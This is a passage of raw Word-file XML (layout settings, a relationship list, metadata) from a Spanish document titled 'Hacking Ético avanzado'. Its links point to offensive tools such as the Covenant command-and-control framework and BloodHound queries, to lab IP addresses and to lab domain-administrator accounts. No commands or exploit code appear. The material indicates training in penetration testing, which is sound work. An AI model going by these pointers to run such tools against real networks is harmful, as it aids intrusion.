        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1200892877">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1334213331">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1949771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github.com/cobbr/Covenant" TargetMode="External"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image16.png"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:github.com/rverton/webanalyze/cmd/webanalyze@latest" TargetMode="External"/><Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image29.png"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image32.png"/><Relationship Id="rId50" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image34.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github.com/ZephrFish/Bloodhound-CustomQueries/blob/main/customqueries.json" TargetMode="External"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:corp.local/administrador@WS01.corp.local" TargetMode="External"/><Relationship Id="rId40" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://127.0.0.1:7443" TargetMode="External"/><Relationship Id="rId45" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://(ip/dominio)"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github.com/hausec/Bloodhound-Custom-Queries/blob/master/customqueries.json" TargetMode="External"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image30.png"/><Relationship Id="rId52"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7.png"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://192.168.20.133:8080" TargetMode="External"/><Relationship Id="rId48" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image33.png"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image3.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6.png"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:corp.local/administrador@DC01.local" TargetMode="External"/><Relationship Id="rId46" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image31.png"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image15.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mailto:administrador@192.168.20.133" TargetMode="External"/><Relationship Id="rId49" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://192.168.20.133:8080"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4FB929-2E96-46F2-B357-5B3D39320F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1284</TotalTime>
  <Pages>1</Pages>
  <Words>5521</Words>
  <Characters>30371</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>253</Lines>
  <Paragraphs>71</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <HeadingPairs>
    <vt:vector size="2" baseType="variant">
      <vt:variant>
        <vt:lpstr>Título</vt:lpstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="1" baseType="lpstr">
      <vt:lpstr>Hacking Ético avanzado</vt:lpstr>
    </vt:vector>
  </TitlesOfParts>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>35821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Hacking Ético avanzado</dc:title>
  <dc:subject/>
  <dc:creator>Eliezer Cabrales Calvente</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Eliezer Cabrales Calvente</cp:lastModifiedBy>
  <cp:revision>87</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-04-03T14:34:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-04-12T13:55:00Z</dcterms:modified>
</cp:coreProperties>
</file>